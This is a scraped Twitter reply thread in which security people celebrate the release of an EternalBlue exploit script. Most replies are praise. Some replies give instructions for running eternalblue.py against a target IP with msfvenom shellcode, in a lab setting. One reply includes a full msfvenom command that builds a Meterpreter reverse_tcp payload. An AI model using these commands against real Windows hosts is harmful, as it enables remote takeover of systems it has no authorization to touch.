Twitter | Search | |
Dan Tentler May 8
yaaaaaaas \o/
Reply Retweet Like
egyp7 May 8
woot
Reply Retweet Like
Marcello May 8
sweeeeeeeeeeeet! :D
Reply Retweet Like
Kartone May 8
Great !
Reply Retweet Like
Cannïbal May 8
This is amazing. Thank you both :D
Reply Retweet Like
👁 May 8
Thank you :)
Reply Retweet Like
W͌ͬ̈́̒̔ill G̠ɘnovɘƨɘ May 8
nice!
Reply Retweet Like
Hardik Mehta May 8
Awesome!
Reply Retweet Like
Jenna Magius May 8
Replying to @TinkerSec @zerosum0x0
If you have a lab with 2008R2 and get a chance, I'd love an independent testimony of it working:
Reply Retweet Like
Jenna Magius May 8
Replying to @TinkerSec @zerosum0x0
. Run exploits/eternalblue/eternalblue.py [IP address] [msfvenom -f raw output file (right architecture)]
Reply Retweet Like
Jenna Magius May 8
Replying to @TinkerSec @zerosum0x0
Actually, exploits/eternalblue will have to be your working directory, there's one relative path I'll make robuster tomorrow
Reply Retweet Like
Jenna Magius May 8
Replying to @TinkerSec @zerosum0x0
The python should be trivial to check for backdoors. As for the victim, well... revert it to snapshot after ;) :p
Reply Retweet Like
Jenna Magius May 8
Replying to @TinkerSec @zerosum0x0
We'll get all the binary blobs documented and simplified to make them more obviously backdoor-free in the future
Reply Retweet Like
Jenna Magius May 8
Replying to @TinkerSec @zerosum0x0
(man, if I had sent you this on masto it'd've fit in ~one message...)
Reply Retweet Like
DEY! May 8
Great work!
Reply Retweet Like
W͌ͬ̈́̒̔ill G̠ɘnovɘƨɘ May 8
tried on 2k8 r2 datacenter using msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=4444 -f raw -o test.bin but no meterpreter
Reply Retweet Like
W͌ͬ̈́̒̔ill G̠ɘnovɘƨɘ May 8
checked with eternalblue+doublepulsar+meterpreter.dll and succeeded, not sure if i missed something on yours or playback not working :/
Reply Retweet Like
Зед May 9
W00t!
Reply Retweet Like